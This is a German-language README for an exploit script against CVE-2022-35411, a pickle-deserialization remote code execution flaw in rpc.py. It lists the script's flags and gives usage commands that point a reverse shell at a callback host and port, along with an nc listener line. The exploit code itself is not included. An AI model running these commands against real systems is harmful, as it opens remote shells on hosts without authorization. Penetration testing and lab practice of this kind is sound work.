
Exploit für CVE-2022-35411 — Unauthentifizierte RCE in rpc.py (<= 0.6.0)
Dies ist ein aktualisierter und verbesserter Exploit für CVE-2022-35411, der auf anfällige Versionen von rpc.py (<= 0.6.0) abzielt.
Er ermöglicht nicht authentifizierte Remotecodeausführung (RCE) über Python pickle-Deserialisierung.
Ursprünglicher Exploit von: Elias Hohl
Verbessert von: x7331 für Benutzerfreundlichkeit, Portabilität und Automatisierung
Die Schwachstelle liegt in der unsicheren Verwendung des Python-pickle-Moduls durch rpc.py, wodurch manipulierte Payloads beliebige Befehle ohne Authentifizierung ausführen können.
v0.4.2 – v0.6.0argparse mit den Flags --lhost, --lport, --target und --dry-run-h / --helppython3 rpc-rce.py --lhost 10.10.14.1 --lport 9001
python3 rpc-rce.py --lhost 10.10.14.1 --lport 9001 --dry-run
python3 rpc-rce.py --lhost 10.10.14.1 --lport 9001 --target http://victim.internal:65432/sayhi
3.xrequests-Bibliothek (Installation mit pip install requests)nc -lvnp 9001)Dieser Exploit wird nur zu Bildungs- und autorisierten Testzwecken bereitgestellt. Verwenden Sie ihn NICHT auf Systemen, die Ihnen nicht gehören oder für die Sie keine ausdrückliche Genehmigung zum Testen haben.